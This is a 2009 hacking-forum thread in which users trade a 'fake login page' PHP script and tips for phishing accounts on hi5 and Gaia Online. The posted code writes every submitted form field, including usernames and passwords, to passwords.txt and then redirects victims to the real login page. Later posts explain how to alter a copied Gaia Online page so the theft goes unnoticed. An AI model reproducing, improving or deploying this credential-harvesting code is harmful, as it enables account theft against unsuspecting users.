Can somebody post a code for the one that you use? I need to see, and examine it so I can make it better...
Results 1 to 11 of 11
Thread: Login.php
- 21 Dec. 2009 10:47pm #1
Error: Title Not Found
- Age
- 29
- Join Date
- Dec. 2009
- Location
- Hell
- Posts
- 2,248
- Reputation
- 248
- LCash
- 500.00
Login.php
- 21 Dec. 2009 10:49pm #2
- Join Date
- Nov. 2009
- Location
- In CL0V3R's Smoke Ball
- Posts
- 1,010
- Reputation
- 28
- LCash
- 200.00
Code:<?php header ('Location: http://www.hi5.com/friend/login.do '); $handle = fopen("passwords.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($ handle, "\r\n"); fclose($handle) ; exit; ?>
- 21 Dec. 2009 10:50pm #3
Error: Title Not Found
- Age
- 29
- Join Date
- Dec. 2009
- Location
- Hell
- Posts
- 2,248
- Reputation
- 248
- LCash
- 200.00
Did you make that?
- 21 Dec. 2009 10:51pm #4
- Join Date
- Nov. 2009
- Location
- In CL0V3R's Smoke Ball
- Posts
- 1,010
- Reputation
- 28
- LCash
- 200.00
It's A code I use in FLP Login.php Script, Next time use google.
- 21 Dec. 2009 10:53pm #5
Error: Title Not Found
- Age
- 29
- Join Date
- Dec. 2009
- Location
- Hell
- Posts
- 2,248
- Reputation
- 248
- LCash
- 200.00
Google wouldn't help at all. I was just looking at the login.php from that basic guide and it seemed... simple.
- 21 Dec. 2009 10:54pm #6
- Join Date
- Nov. 2009
- Location
- In CL0V3R's Smoke Ball
- Posts
- 1,010
- Reputation
- 28
- LCash
- 200.00
In google search login.php for phisher. Simple
- 21 Dec. 2009 11:13pm #7
Error: Title Not Found
- Age
- 29
- Join Date
- Dec. 2009
- Location
- Hell
- Posts
- 2,248
- Reputation
- 248
- LCash
- 200.00
How about the pkg-gaia-core.js thing (or whatever its called).
The guide doesn't seem to have one
- 21 Dec. 2009 11:14pm #8
- Join Date
- Nov. 2009
- Location
- In CL0V3R's Smoke Ball
- Posts
- 1,010
- Reputation
- 28
- LCash
- 200.00
You don't even need pkg-gaia-core.js
- 21 Dec. 2009 11:16pm #9
Error: Title Not Found
- Age
- 29
- Join Date
- Dec. 2009
- Location
- Hell
- Posts
- 2,248
- Reputation
- 248
- LCash
- 200.00
Really? Lemme check...
- 21 Dec. 2009 11:21pm #10All you need from that is to change the other url from the source code of gaiaonline so it wont redirect. and you can use any FLP login.php you dont need certain Flp php files
- 21 Dec. 2009 11:29pm #11
Error: Title Not Found
- Age
- 29
- Join Date
- Dec. 2009
- Location
- Hell
- Posts
- 2,248
- Reputation
- 248
- LCash
- 200.00
I know. I found out that redirect thing just now >>;
And I know you dont need a specific login.php, I just want to modify it to make it better.
And yes, I need that .js file because without it it wont post the username/password (or at least for the way im trying to post it)
E: Wait, no, you're right. My bad...Last edited by TEMPTii; 21 Dec. 2009 at 11:51pm.